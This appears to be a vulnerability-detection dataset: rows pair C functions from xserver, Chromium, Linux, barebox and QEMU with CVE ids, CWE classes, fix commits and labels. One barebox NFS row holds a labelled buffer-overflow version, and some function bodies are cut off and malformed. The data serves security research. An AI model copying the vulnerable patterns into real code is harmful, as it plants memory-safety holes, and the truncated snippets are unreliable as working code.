set_font_authorizations(char **authorizations, int *authlen, pointer client) { #define AUTHORIZATION_NAME "hp-hostname-1" #if defined(TCPCONN) || defined(STREAMSCONN) static char *result = NULL; static char *p = NULL; if (p == NULL) { char hname[1024], *hnameptr; unsigned int len; #if defined(IPv6) && defined(AF_INET6) struct addrinfo hints, *ai = NULL; #else struct hostent *host; #ifdef XTHREADS_NEEDS_BYNAMEPARAMS _Xgethostbynameparams hparams; #endif #endif gethostname(hname, 1024); #if defined(IPv6) && defined(AF_INET6) memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_CANONNAME; if (getaddrinfo(hname, NULL, &hints, &ai) == 0) { hnameptr = ai->ai_canonname; } else { hnameptr = hname; } #else host = _XGethostbyname(hname, hparams); if (host == NULL) hnameptr = hname; else hnameptr = host->h_name; #endif len = strlen(hnameptr) + 1; result = malloc(len + sizeof(AUTHORIZATION_NAME) + 4); p = result; *p++ = sizeof(AUTHORIZATION_NAME) >> 8; *p++ = sizeof(AUTHORIZATION_NAME) & 0xff; *p++ = (len) >> 8; *p++ = (len & 0xff); memmove(p, AUTHORIZATION_NAME, sizeof(AUTHORIZATION_NAME)); p += sizeof(AUTHORIZATION_NAME); memmove(p, hnameptr, len); p += len; #if defined(IPv6) && defined(AF_INET6) if (ai) { freeaddrinfo(ai); } #endif } *authlen = p - result; *authorizations = result; return 1; #else /* TCPCONN */ return 0; #endif /* TCPCONN */ }
set_font_authorizations(char **authorizations, int *authlen, pointer client) { #define AUTHORIZATION_NAME "hp-hostname-1" #if defined(TCPCONN) || defined(STREAMSCONN) static char *result = NULL; static char *p = NULL; if (p == NULL) { char hname[1024], *hnameptr; unsigned int len; #if defined(IPv6) && defined(AF_INET6) struct addrinfo hints, *ai = NULL; #else struct hostent *host; #ifdef XTHREADS_NEEDS_BYNAMEPARAMS _Xgethostbynameparams hparams; #endif #endif gethostname(hname, 1024); #if defined(IPv6) && defined(AF_INET6) memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_CANONNAME; if (getaddrinfo(hname, NULL, &hints, &ai) == 0) { hnameptr = ai->ai_canonname; } else { hnameptr = hname; } #else host = _XGethostbyname(hname, hparams); if (host == NULL) hnameptr = hname; else hnameptr = host->h_name; #endif len = strlen(hnameptr) + 1; result = malloc(len + sizeof(AUTHORIZATION_NAME) + 4); p = result; *p++ = sizeof(AUTHORIZATION_NAME) >> 8; *p++ = sizeof(AUTHORIZATION_NAME) & 0xff; *p++ = (len) >> 8; *p++ = (len & 0xff); memmove(p, AUTHORIZATION_NAME, sizeof(AUTHORIZATION_NAME)); p += sizeof(AUTHORIZATION_NAME); memmove(p, hnameptr, len); p += len; #if defined(IPv6) && defined(AF_INET6) if (ai) { freeaddrinfo(ai); } #endif } *authlen = p - result; *authorizations = result; return 1; #else /* TCPCONN */ return 0; #endif /* TCPCONN */ }
C
xserver
0
CVE-2016-5216
https://www.cvedetails.com/cve/CVE-2016-5216/
CWE-416
https://github.com/chromium/chromium/commit/bf6a6765d44b09c64b8c75d749efb84742a250e7
bf6a6765d44b09c64b8c75d749efb84742a250e7
[pdf] Defer page unloading in JS callback. One of the callbacks from PDFium JavaScript into the embedder is to get the current page number. In Chromium, this triggers a call to CalculateMostVisiblePage; that method determines the visible pages and unloads any non-visible pages. But if the originating JS is on a non-visible page, we'll delete the page and the annotations associated with that page. This causes issues because we are still working with those objects when the JavaScript returns. This CL defers the page unloading triggered by getting the most visible page until the next event is handled by the Chromium embedder. BUG=chromium:653090 Review-Url: https://codereview.chromium.org/2418533002 Cr-Commit-Position: refs/heads/master@{#424781}
void* MapFont(struct _FPDF_SYSFONTINFO*, int weight, int italic, int charset, int pitch_family, const char* face, int* exact) { if (!pp::Module::Get()) return nullptr; pp::BrowserFontDescription description; if (strcmp(face, "Symbol") == 0) return nullptr; if (pitch_family & FXFONT_FF_FIXEDPITCH) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_MONOSPACE); } else if (pitch_family & FXFONT_FF_ROMAN) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_SERIF); } static const struct { const char* pdf_name; const char* face; bool bold; bool italic; } kPdfFontSubstitutions[] = { {"Courier", "Courier New", false, false}, {"Courier-Bold", "Courier New", true, false}, {"Courier-BoldOblique", "Courier New", true, true}, {"Courier-Oblique", "Courier New", false, true}, {"Helvetica", "Arial", false, false}, {"Helvetica-Bold", "Arial", true, false}, {"Helvetica-BoldOblique", "Arial", true, true}, {"Helvetica-Oblique", "Arial", false, true}, {"Times-Roman", "Times New Roman", false, false}, {"Times-Bold", "Times New Roman", true, false}, {"Times-BoldItalic", "Times New Roman", true, true}, {"Times-Italic", "Times New Roman", false, true}, {"MS-PGothic", "MS PGothic", false, false}, {"MS-Gothic", "MS Gothic", false, false}, {"MS-PMincho", "MS PMincho", false, false}, {"MS-Mincho", "MS Mincho", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x83\x53\x83\x56\x83\x62\x83\x4E", "MS PGothic", false, false}, {"\x82\x6C\x82\x72\x83\x53\x83\x56\x83\x62\x83\x4E", "MS Gothic", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x96\xBE\x92\xA9", "MS PMincho", false, false}, {"\x82\x6C\x82\x72\x96\xBE\x92\xA9", "MS Mincho", false, false}, }; if (charset == FXFONT_ANSI_CHARSET && (pitch_family & FXFONT_FF_FIXEDPITCH)) face = "Courier New"; size_t i; for (i = 0; i < arraysize(kPdfFontSubstitutions); ++i) { if (strcmp(face, kPdfFontSubstitutions[i].pdf_name) == 0) { description.set_face(kPdfFontSubstitutions[i].face); if (kPdfFontSubstitutions[i].bold) description.set_weight(PP_BROWSERFONT_TRUSTED_WEIGHT_BOLD); if (kPdfFontSubstitutions[i].italic) description.set_italic(true); break; } } if (i == arraysize(kPdfFontSubstitutions)) { std::string face_utf8; if (base::IsStringUTF8(face)) { face_utf8 = face; } else { std::string encoding; if (base::DetectEncoding(face, &encoding)) { base::ConvertToUtf8AndNormalize(face, encoding, &face_utf8); } } if (face_utf8.empty()) return nullptr; description.set_face(face_utf8); description.set_weight(WeightToBrowserFontTrustedWeight(weight)); description.set_italic(italic > 0); } if (!pp::PDF::IsAvailable()) { NOTREACHED(); return nullptr; } PP_Resource font_resource = pp::PDF::GetFontFileWithFallback( pp::InstanceHandle(g_last_instance_id), &description.pp_font_description(), static_cast<PP_PrivateFontCharset>(charset)); long res_id = font_resource; return reinterpret_cast<void*>(res_id); }
void* MapFont(struct _FPDF_SYSFONTINFO*, int weight, int italic, int charset, int pitch_family, const char* face, int* exact) { if (!pp::Module::Get()) return nullptr; pp::BrowserFontDescription description; if (strcmp(face, "Symbol") == 0) return nullptr; if (pitch_family & FXFONT_FF_FIXEDPITCH) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_MONOSPACE); } else if (pitch_family & FXFONT_FF_ROMAN) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_SERIF); } static const struct { const char* pdf_name; const char* face; bool bold; bool italic; } kPdfFontSubstitutions[] = { {"Courier", "Courier New", false, false}, {"Courier-Bold", "Courier New", true, false}, {"Courier-BoldOblique", "Courier New", true, true}, {"Courier-Oblique", "Courier New", false, true}, {"Helvetica", "Arial", false, false}, {"Helvetica-Bold", "Arial", true, false}, {"Helvetica-BoldOblique", "Arial", true, true}, {"Helvetica-Oblique", "Arial", false, true}, {"Times-Roman", "Times New Roman", false, false}, {"Times-Bold", "Times New Roman", true, false}, {"Times-BoldItalic", "Times New Roman", true, true}, {"Times-Italic", "Times New Roman", false, true}, {"MS-PGothic", "MS PGothic", false, false}, {"MS-Gothic", "MS Gothic", false, false}, {"MS-PMincho", "MS PMincho", false, false}, {"MS-Mincho", "MS Mincho", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x83\x53\x83\x56\x83\x62\x83\x4E", "MS PGothic", false, false}, {"\x82\x6C\x82\x72\x83\x53\x83\x56\x83\x62\x83\x4E", "MS Gothic", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x96\xBE\x92\xA9", "MS PMincho", false, false}, {"\x82\x6C\x82\x72\x96\xBE\x92\xA9", "MS Mincho", false, false}, }; if (charset == FXFONT_ANSI_CHARSET && (pitch_family & FXFONT_FF_FIXEDPITCH)) face = "Courier New"; size_t i; for (i = 0; i < arraysize(kPdfFontSubstitutions); ++i) { if (strcmp(face, kPdfFontSubstitutions[i].pdf_name) == 0) { description.set_face(kPdfFontSubstitutions[i].face); if (kPdfFontSubstitutions[i].bold) description.set_weight(PP_BROWSERFONT_TRUSTED_WEIGHT_BOLD); if (kPdfFontSubstitutions[i].italic) description.set_italic(true); break; } } if (i == arraysize(kPdfFontSubstitutions)) { std::string face_utf8; if (base::IsStringUTF8(face)) { face_utf8 = face; } else { std::string encoding; if (base::DetectEncoding(face, &encoding)) { base::ConvertToUtf8AndNormalize(face, encoding, &face_utf8); } } if (face_utf8.empty()) return nullptr; description.set_face(face_utf8); description.set_weight(WeightToBrowserFontTrustedWeight(weight)); description.set_italic(italic > 0); } if (!pp::PDF::IsAvailable()) { NOTREACHED(); return nullptr; } PP_Resource font_resource = pp::PDF::GetFontFileWithFallback( pp::InstanceHandle(g_last_instance_id), &description.pp_font_description(), static_cast<PP_PrivateFontCharset>(charset)); long res_id = font_resource; return reinterpret_cast<void*>(res_id); }
C
Chrome
0
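The deferral described in the commit message above is the classic "don't free what your caller is still using" pattern: record the request during the callback and act on it at the next event-loop turn. A minimal sketch with hypothetical names (none of these are the actual Chromium identifiers):

    static bool defer_page_unload;                 /* hypothetical flag */

    int GetMostVisiblePage(void)
    {
        defer_page_unload = true;                  /* don't unload mid-callback */
        return CalculateMostVisiblePageIndex();    /* placeholder helper */
    }

    void OnNextEmbedderEvent(void)
    {
        if (defer_page_unload) {
            defer_page_unload = false;
            UnloadNonVisiblePages();               /* safe: the JS has returned */
        }
    }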
CVE-2012-6541
https://www.cvedetails.com/cve/CVE-2012-6541/
CWE-200
https://github.com/torvalds/linux/commit/7b07f8eb75aa3097cdfd4f6eac3da49db787381d
7b07f8eb75aa3097cdfd4f6eac3da49db787381d
dccp: fix info leak via getsockopt(DCCP_SOCKOPT_CCID_TX_INFO) The CCID3 code fails to initialize the trailing padding bytes of struct tfrc_tx_info added for alignment on 64 bit architectures. It thereby potentially leaks four bytes of kernel stack via the getsockopt() syscall. Add an explicit memset(0) before filling the structure to avoid the info leak. Signed-off-by: Mathias Krause <[email protected]> Cc: Gerrit Renker <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void ccid3_hc_tx_exit(struct sock *sk) { struct ccid3_hc_tx_sock *hc = ccid3_hc_tx_sk(sk); sk_stop_timer(sk, &hc->tx_no_feedback_timer); tfrc_tx_hist_purge(&hc->tx_hist); }
static void ccid3_hc_tx_exit(struct sock *sk) { struct ccid3_hc_tx_sock *hc = ccid3_hc_tx_sk(sk); sk_stop_timer(sk, &hc->tx_no_feedback_timer); tfrc_tx_hist_purge(&hc->tx_hist); }
C
linux
0
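The remedy named in the commit message above is a single line: zero the whole struct, padding bytes included, before filling it and copying it to user space. Sketched below (field assignments abbreviated; treat the field list as illustrative):

    struct tfrc_tx_info tfrc;
    memset(&tfrc, 0, sizeof(tfrc));   /* clears the trailing padding bytes too */
    tfrc.tfrctx_x   = hc->tx_x;       /* then fill the named fields */
    tfrc.tfrctx_rtt = hc->tx_rtt;
    /* ... remaining fields ... */
    if (copy_to_user(optval, &tfrc, sizeof(tfrc)))
        return -EFAULT;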
CVE-2012-2875
https://www.cvedetails.com/cve/CVE-2012-2875/
null
https://github.com/chromium/chromium/commit/1266ba494530a267ec8a21442ea1b5cae94da4fb
1266ba494530a267ec8a21442ea1b5cae94da4fb
Introduce XGetImage() for GrabWindowSnapshot() in ChromeOS. BUG=119492 TEST=manually done Review URL: https://chromiumcodereview.appspot.com/10386124 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@137556 0039d316-1c4b-4281-b951-d872f2087c98
void RootWindowHostLinux::MoveCursorTo(const gfx::Point& location) { XWarpPointer(xdisplay_, None, xwindow_, 0, 0, 0, 0, location.x(), location.y()); }
void RootWindowHostLinux::MoveCursorTo(const gfx::Point& location) { XWarpPointer(xdisplay_, None, xwindow_, 0, 0, 0, 0, location.x(), location.y()); }
C
Chrome
0
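XGetImage() is the core Xlib call behind the snapshot path mentioned in the commit message above; it synchronously pulls a window's pixels into client memory. A hedged usage sketch (display and window are assumed to be a valid connection and drawable):

    #include <X11/Xlib.h>
    #include <X11/Xutil.h>

    XWindowAttributes attr;
    XGetWindowAttributes(display, window, &attr);
    XImage *img = XGetImage(display, window, 0, 0,
                            attr.width, attr.height, AllPlanes, ZPixmap);
    if (img) {
        /* img->data now holds the pixels; copy or encode as needed */
        XDestroyImage(img);
    }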
CVE-2016-1696
https://www.cvedetails.com/cve/CVE-2016-1696/
CWE-284
https://github.com/chromium/chromium/commit/c0569cc04741cccf6548c2169fcc1609d958523f
c0569cc04741cccf6548c2169fcc1609d958523f
[Extensions] Expand bindings access checks BUG=601149 BUG=601073 Review URL: https://codereview.chromium.org/1866103002 Cr-Commit-Position: refs/heads/master@{#387710}
void DisplaySourceCustomBindings::TerminateSession( const v8::FunctionCallbackInfo<v8::Value>& args) { CHECK_EQ(1, args.Length()); CHECK(args[0]->IsInt32()); v8::Isolate* isolate = context()->isolate(); int sink_id = args[0]->ToInt32(args.GetIsolate())->Value(); DisplaySourceSession* session = GetDisplaySession(sink_id); if (!session) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionNotFound))); return; } DisplaySourceSession::State state = session->state(); DCHECK_NE(state, DisplaySourceSession::Idle); if (state == DisplaySourceSession::Establishing) { isolate->ThrowException(v8::Exception::Error( v8::String::NewFromUtf8(isolate, kSessionNotFound))); return; } if (state == DisplaySourceSession::Terminating) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionAlreadyTerminating))); return; } int32_t call_id = GetCallbackId(); args.GetReturnValue().Set(call_id); auto on_call_completed = base::Bind(&DisplaySourceCustomBindings::OnCallCompleted, weak_factory_.GetWeakPtr(), call_id); session->Terminate(on_call_completed); }
void DisplaySourceCustomBindings::TerminateSession( const v8::FunctionCallbackInfo<v8::Value>& args) { CHECK_EQ(1, args.Length()); CHECK(args[0]->IsInt32()); v8::Isolate* isolate = context()->isolate(); int sink_id = args[0]->ToInt32(args.GetIsolate())->Value(); DisplaySourceSession* session = GetDisplaySession(sink_id); if (!session) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionNotFound))); return; } DisplaySourceSession::State state = session->state(); DCHECK_NE(state, DisplaySourceSession::Idle); if (state == DisplaySourceSession::Establishing) { isolate->ThrowException(v8::Exception::Error( v8::String::NewFromUtf8(isolate, kSessionNotFound))); return; } if (state == DisplaySourceSession::Terminating) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionAlreadyTerminating))); return; } int32_t call_id = GetCallbackId(); args.GetReturnValue().Set(call_id); auto on_call_completed = base::Bind(&DisplaySourceCustomBindings::OnCallCompleted, weak_factory_.GetWeakPtr(), call_id); session->Terminate(on_call_completed); }
C
Chrome
0
CVE-2019-15937
https://www.cvedetails.com/cve/CVE-2019-15937/
CWE-119
https://git.pengutronix.de/cgit/barebox/commit/net/nfs.c?h=next&id=84986ca024462058574432b5483f4bf9136c538d
84986ca024462058574432b5483f4bf9136c538d
null
static int nfs_readlink_reply(unsigned char *pkt, unsigned len) { uint32_t *data; char *path; unsigned int rlen; int ret; ret = rpc_check_reply(pkt, 1); if (ret) return ret; data = (uint32_t *)(pkt + sizeof(struct rpc_reply)); data++; rlen = ntohl(net_read_uint32(data)); /* new path length */ rlen = max_t(unsigned int, rlen, len - sizeof(struct rpc_reply) - sizeof(uint32_t)); data++; path = (char *)data; } else { memcpy(nfs_path, path, rlen); nfs_path[rlen] = 0; }
static int nfs_readlink_reply(unsigned char *pkt, unsigned len) { uint32_t *data; char *path; int rlen; int ret; ret = rpc_check_reply(pkt, 1); if (ret) return ret; data = (uint32_t *)(pkt + sizeof(struct rpc_reply)); data++; rlen = ntohl(net_read_uint32(data)); /* new path length */ data++; path = (char *)data; } else { memcpy(nfs_path, path, rlen); nfs_path[rlen] = 0; }
C
pengutronix
1
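Per the func_before/func_after diff above, the fix widens rlen to unsigned and clamps it against the bytes actually present after the RPC reply header, so the later memcpy() into nfs_path cannot run past the packet. The general clamp-before-copy pattern, sketched (a full fix would also cap rlen at the size of the nfs_path destination buffer):

    /* bound an attacker-supplied length by what the packet really contains */
    unsigned int avail = len - sizeof(struct rpc_reply) - sizeof(uint32_t);
    if (rlen > avail)
        rlen = avail;
    memcpy(nfs_path, path, rlen);
    nfs_path[rlen] = 0;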
CVE-2017-7277
https://www.cvedetails.com/cve/CVE-2017-7277/
CWE-125
https://github.com/torvalds/linux/commit/8605330aac5a5785630aec8f64378a54891937cc
8605330aac5a5785630aec8f64378a54891937cc
tcp: fix SCM_TIMESTAMPING_OPT_STATS for normal skbs __sock_recv_timestamp can be called for both normal skbs (for receive timestamps) and for skbs on the error queue (for transmit timestamps). Commit 1c885808e456 (tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING) assumes that any skb passed to __sock_recv_timestamp is from the error queue, containing OPT_STATS in the content of the skb. This results in accessing invalid memory or generating junk data. To fix this, set skb->pkt_type to PACKET_OUTGOING for packets on the error queue. This is safe because on the receive path on local sockets skb->pkt_type is never set to PACKET_OUTGOING. With that, copy OPT_STATS from a packet only if its pkt_type is PACKET_OUTGOING. Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING") Reported-by: JongHwan Kim <[email protected]> Signed-off-by: Soheil Hassas Yeganeh <[email protected]> Signed-off-by: Eric Dumazet <[email protected]> Signed-off-by: Willem de Bruijn <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void __kfree_skb_defer(struct sk_buff *skb) { _kfree_skb_defer(skb); }
void __kfree_skb_defer(struct sk_buff *skb) { _kfree_skb_defer(skb); }
C
linux
0
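The commit message above distinguishes error-queue skbs from receive-path skbs by tagging the former with skb->pkt_type. The shape of the fix, sketched with the surrounding kernel code elided:

    /* when queueing a TX timestamp skb on the socket error queue */
    skb->pkt_type = PACKET_OUTGOING;

    /* later, in __sock_recv_timestamp(): only error-queue skbs carry
     * OPT_STATS, so gate the cmsg emission on the tag */
    if (skb->pkt_type == PACKET_OUTGOING) {
        /* ... emit the SCM_TIMESTAMPING_OPT_STATS cmsg from skb content ... */
    }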
CVE-2016-7425
https://www.cvedetails.com/cve/CVE-2016-7425/
CWE-119
https://github.com/torvalds/linux/commit/7bc2b55a5c030685b399bb65b6baa9ccc3d1f167
7bc2b55a5c030685b399bb65b6baa9ccc3d1f167
scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() We need to put an upper bound on "user_len" so the memcpy() doesn't overflow. Cc: <[email protected]> Reported-by: Marco Grassi <[email protected]> Signed-off-by: Dan Carpenter <[email protected]> Reviewed-by: Tomas Henzl <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
static void arcmsr_hbaD_start_bgrb(struct AdapterControlBlock *pACB) { struct MessageUnit_D *pmu = pACB->pmuD; pACB->acb_flags |= ACB_F_MSG_START_BGRB; writel(ARCMSR_INBOUND_MESG0_START_BGRB, pmu->inbound_msgaddr0); if (!arcmsr_hbaD_wait_msgint_ready(pACB)) { pr_notice("arcmsr%d: wait 'start adapter " "background rebulid' timeout\n", pACB->host->host_no); } }
static void arcmsr_hbaD_start_bgrb(struct AdapterControlBlock *pACB) { struct MessageUnit_D *pmu = pACB->pmuD; pACB->acb_flags |= ACB_F_MSG_START_BGRB; writel(ARCMSR_INBOUND_MESG0_START_BGRB, pmu->inbound_msgaddr0); if (!arcmsr_hbaD_wait_msgint_ready(pACB)) { pr_notice("arcmsr%d: wait 'start adapter " "background rebulid' timeout\n", pACB->host->host_no); } }
C
linux
0
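The arcmsr fix described above is the textbook clamp-before-copy check on a user-controlled length. Sketched below; the buffer names follow the driver's style and the bound constant is an assumption, not verified here:

    if (user_len > ARCMSR_API_DATA_BUFLEN)   /* assumed upper-bound constant */
        user_len = ARCMSR_API_DATA_BUFLEN;   /* or reject the request outright */
    memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len);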
CVE-2014-3610
https://www.cvedetails.com/cve/CVE-2014-3610/
CWE-264
https://github.com/torvalds/linux/commit/854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
KVM: x86: Check non-canonical addresses upon WRMSR Upon WRMSR, the CPU should inject #GP if a non-canonical value (address) is written to certain MSRs. The behavior is "almost" identical for AMD and Intel (ignoring MSRs that are not implemented in either architecture since they would anyhow #GP). However, IA32_SYSENTER_ESP and IA32_SYSENTER_EIP cause #GP if a non-canonical address is written on Intel but not on AMD (which ignores the top 32-bits). Accordingly, this patch injects a #GP on the MSRs which behave identically on Intel and AMD. To eliminate the differences between the architectures, the value which is written to IA32_SYSENTER_ESP and IA32_SYSENTER_EIP is turned into a canonical value before writing instead of injecting a #GP. Some references from the Intel and AMD manuals: According to the Intel SDM description of the WRMSR instruction, #GP is expected on WRMSR "If the source register contains a non-canonical address and ECX specifies one of the following MSRs: IA32_DS_AREA, IA32_FS_BASE, IA32_GS_BASE, IA32_KERNEL_GS_BASE, IA32_LSTAR, IA32_SYSENTER_EIP, IA32_SYSENTER_ESP." According to the AMD instruction manual: LSTAR/CSTAR (SYSCALL): "The WRMSR instruction loads the target RIP into the LSTAR and CSTAR registers. If an RIP written by WRMSR is not in canonical form, a general-protection exception (#GP) occurs." IA32_GS_BASE and IA32_FS_BASE (WRFSBASE/WRGSBASE): "The address written to the base field must be in canonical form or a #GP fault will occur." IA32_KERNEL_GS_BASE (SWAPGS): "The address stored in the KernelGSbase MSR must be in canonical form." This patch fixes CVE-2014-3610. Cc: [email protected] Signed-off-by: Nadav Amit <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static struct kvm_vcpu *svm_create_vcpu(struct kvm *kvm, unsigned int id) { struct vcpu_svm *svm; struct page *page; struct page *msrpm_pages; struct page *hsave_page; struct page *nested_msrpm_pages; int err; svm = kmem_cache_zalloc(kvm_vcpu_cache, GFP_KERNEL); if (!svm) { err = -ENOMEM; goto out; } svm->tsc_ratio = TSC_RATIO_DEFAULT; err = kvm_vcpu_init(&svm->vcpu, kvm, id); if (err) goto free_svm; err = -ENOMEM; page = alloc_page(GFP_KERNEL); if (!page) goto uninit; msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!msrpm_pages) goto free_page1; nested_msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!nested_msrpm_pages) goto free_page2; hsave_page = alloc_page(GFP_KERNEL); if (!hsave_page) goto free_page3; svm->nested.hsave = page_address(hsave_page); svm->msrpm = page_address(msrpm_pages); svm_vcpu_init_msrpm(svm->msrpm); svm->nested.msrpm = page_address(nested_msrpm_pages); svm_vcpu_init_msrpm(svm->nested.msrpm); svm->vmcb = page_address(page); clear_page(svm->vmcb); svm->vmcb_pa = page_to_pfn(page) << PAGE_SHIFT; svm->asid_generation = 0; init_vmcb(svm); svm->vcpu.arch.apic_base = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE; if (kvm_vcpu_is_bsp(&svm->vcpu)) svm->vcpu.arch.apic_base |= MSR_IA32_APICBASE_BSP; svm_init_osvw(&svm->vcpu); return &svm->vcpu; free_page3: __free_pages(nested_msrpm_pages, MSRPM_ALLOC_ORDER); free_page2: __free_pages(msrpm_pages, MSRPM_ALLOC_ORDER); free_page1: __free_page(page); uninit: kvm_vcpu_uninit(&svm->vcpu); free_svm: kmem_cache_free(kvm_vcpu_cache, svm); out: return ERR_PTR(err); }
static struct kvm_vcpu *svm_create_vcpu(struct kvm *kvm, unsigned int id) { struct vcpu_svm *svm; struct page *page; struct page *msrpm_pages; struct page *hsave_page; struct page *nested_msrpm_pages; int err; svm = kmem_cache_zalloc(kvm_vcpu_cache, GFP_KERNEL); if (!svm) { err = -ENOMEM; goto out; } svm->tsc_ratio = TSC_RATIO_DEFAULT; err = kvm_vcpu_init(&svm->vcpu, kvm, id); if (err) goto free_svm; err = -ENOMEM; page = alloc_page(GFP_KERNEL); if (!page) goto uninit; msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!msrpm_pages) goto free_page1; nested_msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!nested_msrpm_pages) goto free_page2; hsave_page = alloc_page(GFP_KERNEL); if (!hsave_page) goto free_page3; svm->nested.hsave = page_address(hsave_page); svm->msrpm = page_address(msrpm_pages); svm_vcpu_init_msrpm(svm->msrpm); svm->nested.msrpm = page_address(nested_msrpm_pages); svm_vcpu_init_msrpm(svm->nested.msrpm); svm->vmcb = page_address(page); clear_page(svm->vmcb); svm->vmcb_pa = page_to_pfn(page) << PAGE_SHIFT; svm->asid_generation = 0; init_vmcb(svm); svm->vcpu.arch.apic_base = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE; if (kvm_vcpu_is_bsp(&svm->vcpu)) svm->vcpu.arch.apic_base |= MSR_IA32_APICBASE_BSP; svm_init_osvw(&svm->vcpu); return &svm->vcpu; free_page3: __free_pages(nested_msrpm_pages, MSRPM_ALLOC_ORDER); free_page2: __free_pages(msrpm_pages, MSRPM_ALLOC_ORDER); free_page1: __free_page(page); uninit: kvm_vcpu_uninit(&svm->vcpu); free_svm: kmem_cache_free(kvm_vcpu_cache, svm); out: return ERR_PTR(err); }
C
linux
0
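On x86-64 with 48-bit virtual addresses, a canonical address has bits 63:47 all equal to bit 47, so the check the patch above describes reduces to a sign-extension comparison. A self-contained sketch of that predicate (the WRMSR plumbing is only hinted at in the comment):

    #include <stdint.h>
    #include <stdbool.h>

    /* canonical (48-bit VA): sign-extending the low 48 bits must
     * reproduce the original address */
    static bool is_noncanonical(uint64_t addr)
    {
        return ((int64_t)(addr << 16) >> 16) != (int64_t)addr;
    }

    /* on WRMSR to MSR_LSTAR, MSR_FS_BASE, MSR_KERNEL_GS_BASE, etc.:
     * if (is_noncanonical(data)) inject #GP instead of writing */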
CVE-2017-7645
https://www.cvedetails.com/cve/CVE-2017-7645/
CWE-20
https://github.com/torvalds/linux/commit/e6838a29ecb484c97e4efef9429643b9851fba6e
e6838a29ecb484c97e4efef9429643b9851fba6e
nfsd: check for oversized NFSv2/v3 arguments A client can append random data to the end of an NFSv2 or NFSv3 RPC call without our complaining; we'll just stop parsing at the end of the expected data and ignore the rest. Encoded arguments and replies are stored together in an array of pages, and if a call is too large it could leave inadequate space for the reply. This is normally OK because NFS RPC's typically have either short arguments and long replies (like READ) or long arguments and short replies (like WRITE). But a client that sends an incorrectly long reply can violate those assumptions. This was observed to cause crashes. Also, several operations increment rq_next_page in the decode routine before checking the argument size, which can leave rq_next_page pointing well past the end of the page array, causing trouble later in svc_free_pages. So, following a suggestion from Neil Brown, add a central check to enforce our expectation that no NFSv2/v3 call has both a large call and a large reply. As followup we may also want to rewrite the encoding routines to check more carefully that they aren't running off the end of the page array. We may also consider rejecting calls that have any extra garbage appended. That would be safer, and within our rights by spec, but given the age of our server and the NFS protocol, and the fact that we've never enforced this before, we may need to balance that against the possibility of breaking some oddball client. Reported-by: Tuomas Haanpää <[email protected]> Reported-by: Ari Kauppi <[email protected]> Cc: [email protected] Reviewed-by: NeilBrown <[email protected]> Signed-off-by: J. Bruce Fields <[email protected]>
static void set_max_drc(void) { #define NFSD_DRC_SIZE_SHIFT 10 nfsd_drc_max_mem = (nr_free_buffer_pages() >> NFSD_DRC_SIZE_SHIFT) * PAGE_SIZE; nfsd_drc_mem_used = 0; spin_lock_init(&nfsd_drc_lock); dprintk("%s nfsd_drc_max_mem %lu \n", __func__, nfsd_drc_max_mem); }
static void set_max_drc(void) { #define NFSD_DRC_SIZE_SHIFT 10 nfsd_drc_max_mem = (nr_free_buffer_pages() >> NFSD_DRC_SIZE_SHIFT) * PAGE_SIZE; nfsd_drc_mem_used = 0; spin_lock_init(&nfsd_drc_lock); dprintk("%s nfsd_drc_max_mem %lu \n", __func__, nfsd_drc_max_mem); }
C
linux
0
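The "central check" the nfsd commit message above describes rejects NFSv2/v3 calls whose encoded arguments are so large that the reply could not fit in the shared page array. An approximate sketch; the predicate name matches the commit's intent but the exact accounting in nfsd differs:

    /* reject oversized v2/v3 calls before decoding; NFSv4 and the ACL
     * code do more careful bounds-checking of their own */
    static bool nfs_request_too_big(struct svc_rqst *rqstp)
    {
        return rqstp->rq_arg.len > PAGE_SIZE;   /* simplified bound */
    }

    /* in the dispatch path: if (nfs_request_too_big(rqstp)) drop the call */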
CVE-2016-9913
https://www.cvedetails.com/cve/CVE-2016-9913/
CWE-400
https://git.qemu.org/?p=qemu.git;a=commit;h=4774718e5c194026ba5ee7a28d9be49be3080e42
4774718e5c194026ba5ee7a28d9be49be3080e42
null
